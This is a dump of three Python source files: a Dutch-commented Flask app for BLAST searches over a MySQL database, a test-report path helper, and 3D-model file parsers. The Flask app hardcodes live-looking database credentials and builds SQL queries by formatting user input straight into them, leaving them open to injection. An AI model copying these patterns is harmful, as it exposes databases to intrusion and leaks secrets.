Voor elke waarde wordt gekeken of\r\n het een waarde heeft, en deze wordt dan aan een variabele gehangen\r\n\r\n :return: de variabelen E_value, score_value, Percent identity en query cover met hun waarde\r\n \"\"\"\r\n lijst_getallen = [\"E-value_value\", \"Score_value\", \"Percent identity\", \"Query cover\"]\r\n # we slaan deze waardes op in een variabele om zo de goeie waardes straks te kunnen filteren in de database\r\n e_value = ''\r\n score = ''\r\n percentidentity = ''\r\n querycover = ''\r\n for item in lijst_getallen:\r\n index_getal = lijst_getallen.index(item)\r\n result = request.form.get(item)\r\n if len(result) > 0:\r\n if index_getal == 0:\r\n e_value = result\r\n if index_getal == 1:\r\n score = result\r\n if index_getal == 2:\r\n percentidentity = result\r\n if index_getal == 3:\r\n querycover = result\r\n\r\n return e_value, score, percentidentity, querycover\r\n # de opgeslagen waardes komen nu samen in een lijst te staan, we doen het op deze manier anders krijg je de\r\n # verkeerde waardes voor de zoekopdrachten\r\n\r\n\r\ndef filters_getallen(resultaat_where, e_value, score, percentidentity, querycover):\r\n \"\"\" Deze functie maakt een lijst aan voor de filters, in die lijst wordt gekeken of het een waarde bevat, zo ja\r\n dan wordt deze toegevoegd in de lijst resultaat_where, als deze lijst leeg is wordt er nog 'where' aan toegevoegd\r\n anders niet. Daarna wordt deze lijst weer gereturnd\r\n\r\n :param resultaat_where: eerdere filters worden meegenomen om 1 lijst te krijgen\r\n :param e_value: eventueel een waarde waar op gefilterd kan worden\r\n :param score: eventueel een waarde waar op gefilterd kan worden\r\n :param percentidentity: eventueel een waarde waar op gefilterd kan worden\r\n :param querycover: eventueel een waarde waar op gefilterd kan worden\r\n :return: resultaat_where, lijst met alle filters\r\n \"\"\"\r\n lijst_tekens = [\"E_value_parameter\", \"Score_parameter\", \"percent_identity_parameter\", \"query_cover_parameter\"]\r\n for item in lijst_tekens:\r\n index_getal = lijst_tekens.index(item)\r\n result = request.form.get(item)\r\n if len(result) > 0:\r\n if index_getal == 0 and e_value != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"E_value {} {}\".format(result, e_value))\r\n elif index_getal == 0 and e_value != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where E_value {} {}\".format(result, e_value))\r\n if index_getal == 1 and score != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"Score {} {}\".format(result, score))\r\n elif index_getal == 1 and score != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Score {} {}\".format(result, score))\r\n if index_getal == 2 and percentidentity != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"Percent_ident {} {}\".format(result, percentidentity))\r\n elif index_getal == 2 and percentidentity != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Percent_ident {} {}\".format(result, percentidentity))\r\n if index_getal == 3 and querycover != '' and len(resultaat_where) > 0:\r\n resultaat_where.append(\"Query_cover {} {}\".format(result, percentidentity))\r\n elif index_getal == 3 and querycover != '' and len(resultaat_where) == 0:\r\n resultaat_where.append(\"where Query_cover {} {}\".format(result, percentidentity))\r\n return resultaat_where\r\n\r\n\r\ndef result_querys(lijst_kolommen, resultaat_kolommen, resultaat_where):\r\n \"\"\" Deze functie maakt connectie aan met de database, en kan dan 2 
querys gaan uitvoeren. 1 query als er gefilterd\r\n is op kolommen, dan wordt ook nog de lijst resultaat_where meegegeven in de query. De andere query als er niet is\r\n gefilterd op kolommen, dan wordt ook de lijst resultaat_where nog meegegeven. Een van deze querys worden uitgevoerd\r\n en het resultaat wordt gereturnd.\r\n\r\n :param lijst_kolommen:\r\n :param resultaat_kolommen:\r\n :param resultaat_where:\r\n :return: resultaat van de query\r\n \"\"\"\r\n # hier wordt de connectie gemaakt van de database\r\n verbinding = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cursor = verbinding.cursor(dictionary=True)\r\n # de query's die worden uitgevoerd, afhankelijk van de gegevens\r\n resultaat = ''\r\n if len(resultaat_kolommen) == 0:\r\n query = \"select {} from seq_read join blast b on seq_read.Read_ID = b.Blast_ID \" \\\r\n \"join eiwitten e on b.Blast_ID = e.Prot_id {}\" \\\r\n .format(\" , \".join(lijst_kolommen), \" and \".join(resultaat_where))\r\n cursor.execute(query)\r\n resultaat = cursor.fetchall()\r\n if len(resultaat_kolommen) != 0:\r\n query = \"select {} from seq_read join blast b on seq_read.Read_ID = b.Blast_ID \" \\\r\n \"join eiwitten e on b.Blast_ID = e.Prot_id {}\" \\\r\n .format(\" , \".join(resultaat_kolommen), \" and \".join(resultaat_where))\r\n cursor.execute(query)\r\n resultaat = cursor.fetchall()\r\n cursor.close()\r\n verbinding.close()\r\n return resultaat\r\n\r\n\r\n@app.route('/organism')\r\ndef organisms():\r\n \"\"\" Deze functie roept eerst 2 waardes op. Daarna als de ene waarde 'None' is, wordt er connectie gelegd aan de\r\n database en wordt er gefilterd op Organismenamen op alfabetische volgorde. Dan wordt er een render_template\r\n gereturnd van organisme samen met het resultaat van de query. Als de waarde niet 'None' is, wordt er een andere\r\n query uitgevoerd met het gekozen organisme naam om daar gegevens van op te halen. 
Dan wordt er een render_template\r\n organisme gereturnd met resultaat van de query\r\n\r\n :return: render_template 'organisme' met resultaat van 1 van de querys\r\n \"\"\"\r\n org = request.args.get(\"organismelijst\")\r\n org2 = \"Where Organisme like '%{}%'\".format(org)\r\n\r\n if org is None:\r\n # hier is de query om in de website de lijst met Organisme te laten zien\r\n connection = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cur = connection.cursor(dictionary=True)\r\n cur.execute(\r\n \"select distinct Organisme,Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \"\r\n \"from blast order by Organisme \")\r\n\r\n data = cur.fetchall()\r\n return render_template('organism.html', data=data)\r\n else:\r\n connection = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cur = connection.cursor(dictionary=True)\r\n query = \"select distinct Organisme,Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \" \\\r\n \"from blast {} order by Organisme\".format(org2)\r\n\r\n cur.execute(query)\r\n\r\n data = cur.fetchall()\r\n return render_template('organism.html', data=data)\r\n\r\n\r\n@app.route('/protein')\r\ndef protein():\r\n \"\"\" Deze functie roept eerst 2 waardes op. Daarna als de ene waarde 'None' is, wordt er connectie gelegd aan de\r\n database en wordt er gefilterd op eiwitnamen op alfabetische volgorde. Dan wordt er een render_template\r\n gereturnd van proein samen met het resultaat van de query. Als de waarde niet 'None' is, wordt er een andere\r\n query uitgevoerd met het gekozen eiwitnaam om daar gegevens van op te halen. Dan wordt er een render_template\r\n protein gereturnd met resultaat van de query\r\n\r\n :return: render_template 'protein' met resultaat van 1 van de querys\r\n \"\"\"\r\n prot = request.args.get(\"proteinlijst\")\r\n prot2 = \"Where Prot_naam like '%{}%'\".format(prot)\r\n # hier is de query om in de website de lijst met eiwitten te laten zien\r\n connection = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cur = connection.cursor(dictionary=True)\r\n if prot is None:\r\n cur.execute(\r\n \"select distinct Prot_naam, Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \"\r\n \"from eiwitten join blast on Prot_id = Actual_ID order by Prot_naam\")\r\n\r\n data = cur.fetchall()\r\n return render_template('protein.html', data=data)\r\n else:\r\n query = \"select distinct Prot_naam, Score,E_value,Actual_ID,Percent_ident,Accessiecode,Query_cover,Taxonomie \" \\\r\n \"from eiwitten join blast on Prot_id = Actual_ID {} order by Prot_naam\".format(prot2)\r\n cur.execute(query)\r\n data = cur.fetchall()\r\n return render_template('protein.html', data=data)\r\n\r\n\r\n@app.route('/blast')\r\ndef blast():\r\n \"\"\" Deze functie haalt de sequentie op, en gaat met een regular expression kijken of het dna, rna of eiwit is. Als\r\n het 1 van deze waarde is, wordt deze waarde op 'True' gezet, de rest staat op False. Als het geen van alle is, wordt\r\n anders op True gezet. 
Daarna wordt er een andere functie aangeroepen voor het resultaat en de titel wat de resultaat\r\n van een eventuele blast is.\r\n\r\n :return: render_template 'blast' met sequentie, resultaat en titel\r\n \"\"\"\r\n sequentie = request.args.get(\"seq\")\r\n add = request.args.get(\"adding\")\r\n dna = False\r\n rna = False\r\n eiwit = False\r\n anders = False\r\n # dit bepaalt wat de ingevoerde sequentie wordt\r\n if sequentie is not None:\r\n if len(re.findall(\"[ATCG]\", sequentie, flags=re.IGNORECASE)) == len(sequentie):\r\n dna = True\r\n elif len(re.findall(\"[AUCG]\", sequentie, flags=re.IGNORECASE)) == len(sequentie):\r\n rna = True\r\n elif len(re.findall(\"[ARNDCFQEGHILKMPSTWYV]\", sequentie, flags=re.IGNORECASE)) == len(sequentie):\r\n eiwit = True\r\n else:\r\n anders = True\r\n resultaat = resultaat_beschrijving(dna, rna, eiwit, anders)\r\n titel = blasten(dna, sequentie)\r\n # if add is None:\r\n # resultaten_database()\r\n # if add is not None:\r\n # adding(add)\r\n return render_template('BLAST.html', sequentie=sequentie, resultaat=resultaat, titel=titel)\r\n\r\n\r\ndef resultaat_beschrijving(dna, rna, eiwit, anders):\r\n \"\"\" Deze functie geeft een string mee, afhankelijk welke waarde op True staat.\r\n\r\n :param dna: True of False waarde, afhankelijk wat de sequentie is\r\n :param rna: True of False waarde, afhankelijk wat de sequentie is\r\n :param eiwit: True of False waarde, afhankelijk wat de sequentie is\r\n :param anders: True of False waarde, afhankelijk wat de sequentie is\r\n :return: string met resultaat wat de ingevoerde sequentie is\r\n \"\"\"\r\n resultaat = ''\r\n # het resultaat wat wordt uitgeprint voor de gebruiken om het te controleren\r\n if dna is True:\r\n resultaat = \"The sequence is DNA\"\r\n elif rna is True:\r\n resultaat = \"The sequence is RNA\"\r\n elif eiwit is True:\r\n resultaat = \"The sequence is protein\"\r\n elif anders is True:\r\n resultaat = \"The sequence is not DNA, RNA or protein\"\r\n\r\n return resultaat\r\n\r\n\r\ndef blasten(dna, sequentie):\r\n \"\"\" Deze sequentie gaat als DNA op True staat, een blast uitvoeren. Hij haalt dan de sequentie op en het blast_type,\r\n hiermee gaat hij naar een andere functie op de blast uit te voeren. Als de titel leeg is, is er geen match gevonden,\r\n is deze niet leeg, dan staan er de blast resultaten in.\r\n\r\n :param dna: True of False afhankelijk wat de ingevoerde sequentie is\r\n :param sequentie: de sequentie die is ingevoerd\r\n :return: de titel, wat of resultaat van de blast bevat of een string waar in staat dat er geen resultaat is gevonden\r\n \"\"\"\r\n if dna is True:\r\n blast_type = request.args.get(\"blast_type\")\r\n if sequentie is not None and blast_type == \"blastx\":\r\n blast_resultaat, titel = blastx_blasten(sequentie)\r\n if sequentie is not None and blast_type == \"tblastx\":\r\n blast_resultaat, titel = tblastx_blasten(sequentie)\r\n else:\r\n titel = ''\r\n\r\n if titel == '':\r\n titel = \"There is no match with: {}\".format(sequentie)\r\n else:\r\n titel = \"\\n\".join(blast_resultaat)\r\n return titel\r\n\r\n\r\ndef blastx_blasten(sequentie):\r\n \"\"\" Deze sequentie opent een leeg XML file, daarna gaat het de blast uitvoeren met blastx. De gegevens van deze\r\n blast worden opgeslageni in het bestand en dit bestand wordt gesloten. Daarna wordt dit bestand weer geopend en\r\n wordt voor elk resultaat het organisme, eiwit, sequentie, lengte, e_value en stukje van de vergelijking opgeslagen\r\n in een lege lijst. 
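# --- Illustrative aside, not part of the original source -----------------
# A minimal sketch of the Biopython calls that blastx_blasten() below is
# built on. Running it performs a real (and slow) NCBI query over the
# network; the function name is invented for the example.
from Bio.Blast import NCBIWWW, NCBIXML

def first_hit(sequence):
    handle = NCBIWWW.qblast("blastx", "nr", sequence, hitlist_size=1)
    record = next(NCBIXML.parse(handle))
    for alignment in record.alignments:
        for hsp in alignment.hsps:
            return alignment.title, hsp.expect  # (description, E-value)
    return None, None  # no match found
# --------------------------------------------------------------------------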
Deze wordt samen met titel wat een lege string is gereturnd.\r\n\r\n :param sequentie: de ingevoerde sequentie\r\n :return: blastresultaat, een lijst met gegevens van de blatresultaten\r\n :return titel, een lege string\r\n \"\"\"\r\n titel = ''\r\n blast_resultaat = []\r\n bestand = open(\"Resultaat.xml\", \"w\")\r\n result_handle = NCBIWWW.qblast(\"blastx\", \"nr\", sequentie, alignments=1, hitlist_size=10)\r\n bestand.write(result_handle.getvalue())\r\n bestand.close()\r\n\r\n result_handle = open(\"Resultaat.xml\", \"r\")\r\n blast_records = NCBIXML.parse(result_handle)\r\n blast_record = next(blast_records)\r\n for alignment in blast_record.alignments:\r\n for hsp in alignment.hsps:\r\n blast_resultaat.append(\"****Alignment****\")\r\n titel = alignment.title\r\n titels = titel.split(\"[\")\r\n titelss = titels[1].split(\"]\")\r\n titel_ = titel.split(\"|\")\r\n titel__ = titel_[2].split(\"[\")\r\n blast_resultaat.append(\"Blast organism: {}\".format(titelss[0]))\r\n blast_resultaat.append(\"Protein: {}\".format(titel__[0]))\r\n blast_resultaat.append(\"Sequence: {}\".format(alignment.title))\r\n blast_resultaat.append(\"Length: {}\".format(alignment.length))\r\n blast_resultaat.append(\"E-value: {}\".format(hsp.expect))\r\n blast_resultaat.append(hsp.query[0:75] + \"...\")\r\n blast_resultaat.append(hsp.match[0:75] + \"...\")\r\n blast_resultaat.append(hsp.sbjct[0:75] + \"...\")\r\n blast_resultaat.append(\"\\n\")\r\n\r\n return blast_resultaat, titel\r\n\r\n\r\ndef tblastx_blasten(sequentie):\r\n \"\"\" Deze sequentie opent een leeg XML file, daarna gaat het de blast uitvoeren met tblastx. De gegevens van deze\r\n blast worden opgeslageni in het bestand en dit bestand wordt gesloten. Daarna wordt dit bestand weer geopend en\r\n wordt voor elk resultaat het organisme, sequentie, lengte, e_value en stukje van de vergelijking opgeslagen\r\n in een lege lijst. Deze wordt samen met titel wat een lege string is gereturnd.\r\n\r\n :param sequentie: de ingevoerde sequentie\r\n :return: blastresultaat, een lijst met gegevens van de blatresultaten\r\n :return titel, een lege string\r\n \"\"\"\r\n titel = ''\r\n blast_resultaat = []\r\n bestand = open(\"Resultaat.xml\", \"w\")\r\n result_handle = NCBIWWW.qblast(\"tblastx\", \"nr\", sequentie, alignments=1, hitlist_size=10)\r\n bestand.write(result_handle.getvalue())\r\n bestand.close()\r\n\r\n result_handle = open(\"Resultaat.xml\", \"r\")\r\n blast_records = NCBIXML.parse(result_handle)\r\n blast_record = next(blast_records)\r\n for alignment in blast_record.alignments:\r\n for hsp in alignment.hsps:\r\n blast_resultaat.append(\"****Alignment****\")\r\n titel = alignment.title\r\n titels = titel.split(\"|\")\r\n titel = \"Blast organisme: \" + titels[4]\r\n blast_resultaat.append(\"Blast organisme: {}\".format(titels[4]))\r\n blast_resultaat.append(\"Sequence: {}\".format(alignment.title))\r\n blast_resultaat.append(\"Length: {}\".format(alignment.length))\r\n blast_resultaat.append(\"E-value: {}\".format(hsp.expect))\r\n blast_resultaat.append(hsp.query[0:75] + \"...\")\r\n blast_resultaat.append(hsp.match[0:75] + \"...\")\r\n blast_resultaat.append(hsp.sbjct[0:75] + \"...\")\r\n blast_resultaat.append(\"\\n\")\r\n\r\n return blast_resultaat, titel\r\n\r\n\r\ndef adding(add):\r\n \"\"\" Deze functie maakt connectie met de database, en voert een query uit om de max blast_id, actual_id en prot_id\r\n op te halen uit de database. 
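# --- Illustrative aside, not part of the original source -----------------
# adding() below recovers the three MAX() values by splitting the string
# repr of the result row. fetchone() already returns a tuple that can be
# unpacked directly, as in this sketch (same query as the original; the
# cursor is assumed to exist):
def next_ids(cursor):
    cursor.execute("select max(Blast_ID), max(Actual_ID), max(Prot_id) "
                   "from eiwitten join blast b on eiwitten.Prot_id = b.Actual_ID "
                   "join seq_read sr on b.Blast_ID = sr.Read_ID")
    max_blast, max_actual, max_prot = cursor.fetchone()
    return max_blast + 1, max_actual + 1, max_prot + 1
# --------------------------------------------------------------------------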
Deze waardes worden + 1 gedaan en worden aan een andere functie meegegeven\r\n\r\n :param add: geeft aan of er resultaat in de database moet worden toegevoegd of niet\r\n \"\"\"\r\n verbinding = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cursor = verbinding.cursor()\r\n query = \"select max(Blast_ID), max(Actual_ID), max(Prot_id) from eiwitten join blast b on \" \\\r\n \"eiwitten.Prot_id = b.Actual_ID join seq_read sr on b.Blast_ID = sr.Read_ID\"\r\n cursor.execute(query)\r\n resultaat = cursor.fetchall()\r\n for item in resultaat:\r\n item = str(item)\r\n item2 = item.split(\",\")\r\n item3 = item2[0].split(\"(\")\r\n blast_id = int(item3[1]) + 1\r\n actual_id = int(item2[1]) + 1\r\n item4 = item2[2].split(\")\")\r\n prot_id = int(item4[0]) + 1\r\n cursor.close()\r\n toevoegen_database(add, blast_id, actual_id, prot_id)\r\n\r\n\r\ndef toevoegen_database(add, blast_id, actual_id, prot_id):\r\n \"\"\" Deze functie opent de resultaten voor de databse van de blast. Daarna maakt hij verbinding met de database,\r\n en gaat dan voor elke regel in het bestand kijken of het de header, sequentie, eiwit, orgnaisme, accessiecode,\r\n score, e_value, querycover of percentage identitys is en wordt dan opgeslagen als een variabele. Als alles een\r\n waarde heeft wordt het toegevoegd in de database, eerst bij de seq_read, dan blast en dan eiwit tabel. Daarna\r\n worden de blast_id, actual_id en prot_id weer +1 gedaan.\r\n\r\n :param add: geeft aan of er resultaat in de database moet worden toegevoegd of niet\r\n :param blast_id: geeft de volgende blast_id mee\r\n :param actual_id: geeft de volgende actual_id mee\r\n :param prot_id: geeft de volgende prot_id meee\r\n :return: nieuwe resultaten in de datbase\r\n \"\"\"\r\n bestand2 = open('resultaten_database.txt', 'r')\r\n verbinding = mysql.connector.connect(host=\"hannl-hlo-bioinformatica-mysqlsrv.mysql.database.azure.com\",\r\n user=\"lszlh@hannl-hlo-bioinformatica-mysqlsrv\",\r\n db=\"lszlh\",\r\n passwd=\"619150\")\r\n cursor = verbinding.cursor()\r\n header = ''\r\n sequentie = ''\r\n eiwit = ''\r\n organisme = ''\r\n accessiecode = ''\r\n score = 0\r\n e_value = 0.0\r\n querycover = 0.0\r\n percentageidentity = 0.0\r\n cursor = verbinding.cursor()\r\n if add is not None:\r\n count = -1\r\n for regel in bestand2:\r\n count += 1\r\n regel = regel.replace(\"\\n\", \"\")\r\n if count == 0:\r\n header = regel\r\n if count == 1:\r\n sequentie = regel\r\n if count == 2:\r\n blast = regel\r\n if regel == \"*** Nieuw resultaat ***\":\r\n if count == 4:\r\n regel2 = regel.split(\":\")\r\n regel3 = regel2[1].split(\"[\")\r\n eiwit = regel3[0]\r\n regel4 = regel3[1].split(\"]\")\r\n organisme = regel4[0]\r\n if count == 5:\r\n regel5 = regel.split(\":\")\r\n accessiecode = regel5[1]\r\n if count == 6:\r\n regel6 = regel.split(\":\")\r\n score = int(regel6[1])\r\n if count == 7:\r\n regel7 = regel.split(\":\")\r\n e_value = float(regel7[1])\r\n if count == 8:\r\n regel8 = regel.split(\":\")\r\n querycover = float(regel8[1])\r\n if count == 9:\r\n regel9 = regel.split(\":\")\r\n percentageidentity = float(regel9[1])\r\n if count == 10:\r\n query_seqread = \"insert into seq_read (Read_ID, Read_type, Header, Sequentie)\" \\\r\n \"values ({}, 1, '{}', '{}')\".format(blast_id, header, sequentie)\r\n cursor.execute(query_seqread)\r\n verbinding.commit()\r\n query_blast = \"insert into blast (Blast_ID, Blast_type, Score, 
Query_cover, E_value, \" \\\r\n \"Percent_ident, Accessiecode, Organisme, Taxonomie, Actual_ID)\" \\\r\n \"values ({}, '{}', {}, {}, {}, {}, '{}', '{}', '-', {})\".format(blast_id, blast,\r\n score,\r\n querycover, e_value,\r\n percentageidentity,\r\n accessiecode,\r\n organisme, actual_id)\r\n cursor.execute(query_blast)\r\n verbinding.commit()\r\n query_eiwitten = \"insert into eiwitten (Prot_id, Prot_naam, Prot_locatie, Bio_domein, \" \\\r\n \"Bio_proces, Bio_functie)\" \\\r\n \"values ({}, '{}', '-', '-', '-', '-')\".format(prot_id, eiwit)\r\n cursor.execute(query_eiwitten)\r\n verbinding.commit()\r\n count = -1\r\n blast_id = blast_id + 1\r\n actual_id = actual_id + 1\r\n prot_id = prot_id + 1\r\n cursor.close()\r\n\r\n\r\ndef resultaten_database():\r\n \"\"\" Deze functie roep de sequentie en blasttype op, opent de XML file van de blast en een nieuw tesktbestand.\r\n Voor elke regel in het bestand worden eerst de enters weggehaald. Daarna als de regel start met @,\r\n wordt de header en sequentie in het bestand geschreven. Als de regel met Hit begint, wordt hit op True gezet en\r\n wordt de query_lengte, beschrijving, accessiecode, score, E-value en wordt de query cover en de percentage identity\r\n berekent. Dit allemaal wordt in het bestand weggeschreven.\r\n\r\n :return: tesktbestand met resulaten voor de database\r\n \"\"\"\r\n sequentie = request.args.get(\"seq\")\r\n blast = request.args.get(\"blast_type\")\r\n bestand = open(\"resultaat.xml\", 'r')\r\n hit = False\r\n bestand_resultaten = open(\"resultaten_database.txt\", 'w')\r\n for regel in bestand:\r\n regel = regel.replace(\"\\n\", \"\")\r\n if regel == \"\" and sequentie is not None:\r\n hit = True\r\n bestand_resultaten.write(\"@Sequentie_gebruiker\" + \"\\n\")\r\n bestand_resultaten.write(sequentie + \"\\n\")\r\n bestand_resultaten.write(blast + \"\\n\")\r\n if \"\" in regel:\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n query_len = int(split[1])\r\n if hit is True:\r\n if \"\")\r\n bestand_resultaten.write(\"Beschrijving: \" + split[1] + \"\\n\")\r\n if \"\")\r\n bestand_resultaten.write(\"Accessie code: \" + split[1] + \"\\n\")\r\n if \"\" in regel:\r\n # dit geeft de score mee van het resultaat\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n bestand_resultaten.write(\"Score: \" + split[1] + \"\\n\")\r\n if \"\" in regel:\r\n # dit geeft de e-value mee\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n bestand_resultaten.write(\"E-value: \" + split[1] + \"\\n\")\r\n if \"\" in regel:\r\n # dit geeft de query from mee om de query cover te bepalen\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n query_from = int(split[1])\r\n if \"\" in regel:\r\n # dit haalt de query to op en gaat daarna de query cover berekenen\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n query_to = int(split[1])\r\n query_cover = ((int(query_to) - int(query_from)) / int(query_len)) * 100\r\n bestand_resultaten.write(\"Query cover: \" + str(query_cover) + \"\\n\")\r\n if \"\" in regel:\r\n # deze geeft de aantal identitys mee\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n hsp_identity = int(split[1])\r\n if \"\" in regel:\r\n # deze gaat het identity percentage berekenen\r\n regel = regel.split(\"<\")\r\n split = regel[1].split(\">\")\r\n hsp_align_len = int(split[1])\r\n identity = (int(hsp_identity) / int(hsp_align_len)) * 100\r\n bestand_resultaten.write(\"Percentage Identity: \" + str(identity) + \"\\n\" + \"\\n\")\r\n 
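# --- Illustrative aside, not part of the original source -----------------
# The two percentages computed above, written as standalone formulas with
# toy numbers: query cover is the aligned fraction of the query, percent
# identity the fraction of identical positions in the alignment.
def query_cover(query_from, query_to, query_len):
    return (query_to - query_from) / query_len * 100

def percent_identity(identities, align_len):
    return identities / align_len * 100

assert query_cover(1, 181, 200) == 90.0    # 180 of 200 query bases aligned
assert percent_identity(45, 60) == 75.0    # 45 of 60 positions identical
# --------------------------------------------------------------------------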
hit = False\r\n bestand_resultaten.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":32751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"519587920","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : huxiansheng (you@example.org)\n\nimport time\nimport os\nimport HTMLTestRunner\nfrom System_setting.Logger import Logger\nfrom System_setting.Root_directory import Root_xpath\n\nlogger = Logger(logger='Test_report').getlog()\n\n# Formats the test report\n\nclass Report():\n\n def get_report_path(self):\n root = Root_xpath()\n root_path = root.get_root_path()\n report_path = root_path + '/Data/Report'\n return report_path\n\n\n def Test_report(self,report_title):\n report_path = self.get_report_path()\n # get the current system time\n month = time.strftime("%m", time.localtime(time.time()))\n day = time.strftime("%d", time.localtime(time.time()))\n report_name = time.strftime("%H_%M_%S", time.localtime(time.time()))\n report_path = report_path + r'/' + month + '月' + r'/' + day+'日'\n report_statu = os.path.exists(report_path)\n # os.makedirs(report_path)\n if not report_statu:\n os.makedirs(report_path)\n report_path = report_path + '/' +report_name + '-' +report_title+'.html'\n fp = open(report_path, "wb")\n # logger.info(':%s has been generated!' % report_title)\n return fp,report_path\n\n\n\n\n","sub_path":"System_setting/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"493258076","text":"#!/usr/bin/env python\n# coding: utf-8\n\n"""\n\nparser functions for 3d objects.\n\n"""\n\nimport struct\nimport numpy as np\n\n\ndef parse_off(off_file):\n """\n Read a .off file and return the vertex coordinates and the vertex-index array of each face\n :type off_file: str\n :param off_file: .off file name\n :return vertices, faces: numpy list of vertex coordinates, numpy list of the vertex indices that form each face\n """\n with open(off_file) as f:\n # drop comments and empty lines\n lines = filter(lambda x: x != '\n' and x[0] != "#", f.readlines())\n\n # the first line holds the file format name\n if "OFF" not in lines.pop(0):\n raise IOError("file must be \"off\" format file.")\n\n # number of vertices, faces and edges\n n_vertices, n_faces, n_edges = map(int, lines.pop(0).split(' '))\n\n # collect the vertex coordinates\n vertices = np.array([map(float, lines[i].split(' '))\n for i in xrange(n_vertices)])\n\n # vertex indices that make up each face\n faces = np.array(\n [map(int, lines[n_vertices + i][3:].rstrip().split(' '))\n for i in xrange(n_faces)])\n\n return vertices, faces\n\n\ndef parse_obj(file_path):\n """\n Read a .obj file and return the vertex, normal and face information\n :param file_path: file path\n :return: vertex list, normal list, face list\n """\n\n with open(file_path) as f:\n lines = filter(lambda x: x != "\n" and x[0] != "#",\n [line.strip().split() for line in f.readlines()])\n\n vertices = np.array([list(map(float, line[1:])) for line in lines if\n line[0] == 'v'])\n normals = np.array([list(map(float, line[1:])) for line in lines if\n line[0] == 'vn'])\n # .obj files use 1-based indices, so subtract 1\n faces = np.array(\n [list(map(lambda x: x - 1, map(int, line[1:]))) for line in\n lines if line[0] == 'f'])\n\n return vertices, normals, faces\n\n\ndef parse_binvox(binvox_file):\n """\n Read a .binvox file and return a 3-D voxel array\n :param binvox_file: file name including its PATH\n :return: 3-D voxel array\n """\n\n with open(binvox_file, mode='rb') as f:\n\n # binvox 1\n binvox = f.readline().strip()\n\n # number of subdivisions per axis\n dim = tuple(map(int, f.readline().strip().split()[1:]))\n\n # translation applied during normalization\n 
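# --- Illustrative aside, not part of the original source -----------------
# The while-loop that follows decodes binvox run-length pairs: one byte is
# the value (0 or 1), the next byte is how often it repeats. The same idea
# on a toy list of pairs, without file I/O:
import numpy as np

def rle_decode(pairs, size):
    out = np.zeros(size, dtype=np.uint8)
    head = 0
    for value, count in pairs:
        if value == 1:              # the array is zero-filled, only 1-runs matter
            out[head:head + count] = 1
        head += count
    return out

assert rle_decode([(0, 3), (1, 2), (0, 1)], 6).tolist() == [0, 0, 0, 1, 1, 0]
# --------------------------------------------------------------------------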
trans = tuple(map(float, f.readline().strip().split()[1:]))\n\n # scale applied during normalization\n scale = float(f.readline().strip().split()[1])\n\n # "data" line (the binary payload starts after it)\n data = f.readline()\n\n # voxel array\n array = np.zeros(shape=(dim[0] * dim[1] * dim[2]), dtype=np.uint8)\n\n # head index into the flat array\n head = 0\n\n while True:\n # read the next value/count byte pair\n binaly = f.read(1)\n num = f.read(1)\n\n # stop at the end of the file\n if binaly == '':\n break\n\n # 0 or 1\n bin_uc = struct.unpack('B', binaly)[0]\n # run length of bin_uc\n n_uc = struct.unpack('B', num)[0]\n\n # the array is zero-filled, so only runs of 1 have to be written\n if bin_uc == 1:\n array[head:head + n_uc] = 1\n\n # advance head by n_uc for the next run\n head += n_uc\n\n # reshape to 3-D and return\n return array.reshape(dim)\n","sub_path":"src/parse3d.py","file_name":"parse3d.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
